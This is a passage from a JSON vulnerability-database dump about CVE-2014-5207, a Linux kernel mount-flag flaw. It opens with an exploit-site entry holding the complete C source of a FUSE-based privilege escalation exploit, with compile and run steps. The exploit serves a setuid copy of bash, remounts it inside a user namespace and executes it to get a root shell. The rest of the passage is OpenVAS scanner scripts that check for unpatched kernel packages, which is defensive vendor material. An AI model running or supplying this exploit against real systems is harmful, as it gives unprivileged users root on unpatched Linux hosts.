Linux kernels through 3.16.1 are affected.", "edition": 2, "published": "2014-10-09T00:00:00", "type": "zdt", "title": "Linux Kernel 3.16.1 FUSE Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "1337DAY-ID-22736", "href": "https://0day.today/exploit/description/22736", "sourceData": "/*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n \r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <[email\u00a0protected]>\r\n \r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n \r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n \r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n \r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n \r\nstatic const char *sh_path = \"/sh\";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n \r\nstatic int hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n \r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, \"/\") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n \r\n return res;\r\n}\r\n \r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n \r\n if (strcmp(path, \"/\") != 0)\r\n return -ENOENT;\r\n \r\n filler(buf, \".\", NULL, 0);\r\n filler(buf, 
\"..\", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n \r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n \r\nstatic int evilfd = -1;\r\n \r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n \r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, \"unshare\");\r\n \r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, \"mount\");\r\n \r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, \"open\");\r\n \r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, \"dup3\");\r\n close(fd2);\r\n \r\n printf(\"Mount hackery seems to have worked.\\n\");\r\n \r\n exit(0);\r\n}\r\n \r\nstatic int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n \r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, \"dup\");\r\n \r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, \"clone\");\r\n \r\n printf(\"Here goes...\\n\");\r\n \r\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\r\n execl(evil_path, \"sh\", \"-p\", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n \r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char *mountpoint;\r\n int multithreaded;\r\n int res;\r\n 
\r\n if (argc != 2) {\r\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\r\n return -EINVAL;\r\n }\r\n \r\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\r\n \r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n \r\n printf(\"FUSE initialized. Time to have some fun...\\n\");\r\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n \r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n \r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open(\"/bin/bash\", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, \"sh\");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22736"}], "openvas": [{"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-08-19T00:00:00", "id": "OPENVAS:1361412562310841934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841934", "type": "openvas", "title": "Ubuntu Update for linux USN-2318-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2318_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2318-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you 
can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841934\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-19 05:59:14 +0200 (Tue, 19 Aug 2014)\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-2318-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"insight\", value:\"Eric W. Biederman discovered a flaw with the mediation of\nmount flags in the Linux kernel's user namespace subsystem. An unprivileged\nuser could exploit this flaw to by-pass mount restrictions, and potentially gain\nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with\nuser namespaces. An unprivileged local user could exploit this flaw to gain\nfull write privileges to a mount that should be read only. 
(CVE-2014-5206)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2318-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2318-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic-lpae\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-lowlatency\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-e500\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-e500mc\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-smp\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc64-emb\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc64-smp\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120086", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-417)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120086\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:06 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-417)\");\n script_tag(name:\"insight\", value:\"fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a mount -o remount command within a user namespace. The do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a mount -o remount command within a user namespace.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. 
You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-417.html\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~3.14.19~17.43.amzn1\", 
rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-08-19T00:00:00", "id": "OPENVAS:1361412562310841935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841935", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2317-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2317_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-trusty USN-2317-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841935\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-19 05:59:19 +0200 (Tue, 19 Aug 2014)\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2317-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Eric W. Biederman discovered a flaw with the mediation of mount\nflags in the Linux kernel's user namespace subsystem. An unprivileged user could\nexploit this flaw to by-pass mount restrictions, and potentially gain\nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with\nuser namespaces. An unprivileged local user could exploit this flaw to gain\nfull write privileges to a mount that should be read only. 
(CVE-2014-5206)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2317-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2317-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic\", ver:\"3.13.0-34.60~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic-lpae\", ver:\"3.13.0-34.60~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-05T16:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7472", "CVE-2016-5828", "CVE-2017-7645", "CVE-2017-5967", "CVE-2013-4270", "CVE-2017-16537", "CVE-2016-2544", "CVE-2015-0570", "CVE-2016-4558", "CVE-2017-10911", "CVE-2017-16647", "CVE-2015-5697", "CVE-2017-16643", "CVE-2017-2647", "CVE-2018-12233", "CVE-2014-5207", "CVE-2016-6130", "CVE-2015-8845", "CVE-2013-4299", "CVE-2018-15572"], "description": "The remote host is missing an update for the Huawei 
EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191478", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1478)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1478\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-4270\", \"CVE-2013-4299\", \"CVE-2014-5207\", \"CVE-2015-0570\", \"CVE-2015-5697\", \"CVE-2015-8845\", \"CVE-2016-2544\", \"CVE-2016-4558\", \"CVE-2016-5828\", \"CVE-2016-6130\", \"CVE-2017-10911\", \"CVE-2017-16537\", \"CVE-2017-16643\", \"CVE-2017-16647\", \"CVE-2017-2647\", \"CVE-2017-5967\", \"CVE-2017-7472\", \"CVE-2017-7645\", \"CVE-2018-12233\", \"CVE-2018-15572\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n 
script_tag(name:\"creation_date\", value:\"2020-01-23 11:51:12 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1478)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1478\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1478\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1478 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the ea_get function in fs/jfs/xattr.c in the Linux kernel through 4.17.1, a memory corruption bug in JFS can be triggered by calling setxattr twice with two different extended attribute names on the same file. This vulnerability can be triggered by an unprivileged user with the ability to create files and execute programs. 
A kmalloc call is incorrect, leading to slab-out-of-bounds in jfs_xattr.(CVE-2018-12233)\n\nThe spectre_v2_select_mitigation function in arch/x86/kernel/cpu/bugs.c in the Linux kernel before 4.18.1 does not always fill RSB upon a context switch, which makes it easier for attackers to conduct userspace-userspace spectreRSB attacks.(CVE-2018-15572)\n\nRace condition in the queue_delete function in sound/core/seq/seq_queue.c in the Linux kernel before 4.4.1 allows local users to cause a denial of service (use-after-free and system crash) by making an ioctl call at a certain time.(CVE-2016-2544)\n\nA flaw was found in the Linux kernel's implementation of BPF in which systems can application can overflow a 32 bit refcount in both program and map refcount. This refcount can wrap and end up a user after free.(CVE-2016-4558)\n\nInterpretation conflict in drivers/md/dm-snap-persistent.c in the Linux kernel through 3.11.6 allows remote authenticated users to obtain sensitive information or modify data via a crafted mapping to a snapshot block device.(CVE-2013-4299)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16537)\n\nA vulnerability in the handling of Transactional Memory on powerpc systems was found. An unprivileged local user can crash the kernel by starting a transaction, suspending it, and then calling any of the exec() class system calls.(CVE-2016-5828)\n\nA cross-boundary flaw was discovered in the Linux kernel software raid driver. The driver accessed a disabled bitmap where only the first byte of the buffer was initialized to zero. This meant that the rest of the request (up to 4095 bytes) was left and copied into user space. 
An attacker could use this flaw to read private information from user space that would not otherwise have been accessible.(CVE-2015-5697)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\n\nRace condition in the ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T19:01:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", "CVE-2013-7263", "CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-12-22T00:00:00", "id": "OPENVAS:1361412562310850628", "href": 